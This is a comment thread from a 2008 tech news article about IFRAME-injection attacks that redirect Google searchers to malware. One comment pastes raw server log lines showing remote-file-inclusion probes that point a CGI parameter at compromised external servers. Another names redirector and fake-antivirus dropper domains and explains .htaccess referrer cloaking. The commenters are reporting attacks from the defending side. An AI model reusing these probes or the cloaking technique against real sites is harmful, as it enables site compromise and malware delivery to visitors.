Skip to content

Channel Register

Hackers find clever new way to hose Google users

6 Mar 2008 03:06

IFRAME piggybacking

SlashdotDiggdel.icio.usReddit
® [Mobile]

« Back to article page

Dancho is Bulgarian 

By Anonymous Coward
Posted Thursday 6th March 2008 09:20 GMT

not Dutch. Just for the record.

Dancho is working in Dutchland 

By John Foo
Posted Thursday 6th March 2008 10:05 GMT
Flame

but born in bulgaria, yes.

</pendanticness contest>

happy that theregister quotes him, as not being a hugely known researchers, some errrm.. professionals doesn't hesitate to vaguely rephrase and repost his work.

keep up the good work Dancho, you're our primary source of information on RBN/NMMG

RE: Dancho is working in Dutchland 

By Roger
Posted Thursday 6th March 2008 12:01 GMT

And "Dutchland" is not "Deutschland" or Germany, but The Netherlands (Holland), for those who think Denmark is the capital of Amsterdam! ;-)

@Roger 

By Richard Bos
Posted Thursday 6th March 2008 12:38 GMT
Pirate

And the Netherlands are not Holland, any more (in fact, rather less) than the UK are England.

Richard

interesting 

By Anonymous Coward
Posted Thursday 6th March 2008 14:14 GMT

I've seen two filks lately have there sites compromised. What they have in common is that have sites with active fora, the initial breach - they got careless and access was gained by keyloggers, and the source of the malware - RBN.

Not Surprised 

By Richard Greenway
Posted Thursday 6th March 2008 17:43 GMT
Unhappy

I've been seeing this from the hosting side for a few months now.

galadriel.netgroup.cz - - [03/Mar/2008:10:02:12 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.altaiseer-eg.com%2Far%2Farticles%2Fjed%2Fumut%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

galadriel.netgroup.cz - - [03/Mar/2008:10:02:13 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.pattibus.it%2Fphplib-7.2b%2Fpages%2Filosi%2Fdohigal%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

galadriel.netgroup.cz - - [03/Mar/2008:10:02:15 -0800] "GET /cgi-bin/ids/index.cgi?mode=http%3A%2F%2Fwww.channelnewsperu.com%2Fimagenes%2Fpublicaciones%2Ffotos%2Fnepicu%2Fegul%2F&album=/Computing/Seattle_Robotics_Society/Robothon_2006 HTTP/1.0" 200 12973 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)"

Randomly changing cgi fields with the full address of compromised servers.

trying to cache in on everyones machines.

Same group that's going after iPower 

By Franklin
Posted Thursday 6th March 2008 21:38 GMT

The attacks which are still ongoing against Web sites hosted by US Web host iPower use the same technique to mask themselves from anything but a Google search, and redirect to the same payload sites.

The basic system is straightforward. Hack into a poorly-secured Web site or inject code into an unsanitized script that redirects to traffloader.info, which is a round-Robin-style redirector that in turn redirects the unfortunate visitor to one of several malware droppers. Some of the more common ones I've seen are scanner.spyshredderscanner.com, xpantivirus.com, or sites masquerading as porn sites which try to drop a Trojan disguised as a movie codec.

In each case, the redirectors or compromised Web sites are protected by an .htaccess file that checks the browser's referrer. If it's "google.com" they redirect, if it isn't they redirect to a 404 error.

iPower has been massively compromised for months, and are still compromised; I've made lists of thousands of Web sites they host which have been hacked and had these redirectors placed on them. The fact that the techniques used are the same and the payload sites are the same strongly suggests that the folks who waltzed into iPower and pwned their servers are the same folks behind this iFrame exploit.

In this day and age, it kind of surprises me that there's still anyone left in the world who is foolish enough not to sanitize any user-supplied input anywhere on their sites--even in search boxes.

@Richard Bos 

By Steve Renouf
Posted Tuesday 11th March 2008 11:49 GMT

.... and if you refer to the ISO country listings, there is no Holland - only Netherlands

Related Whitepapers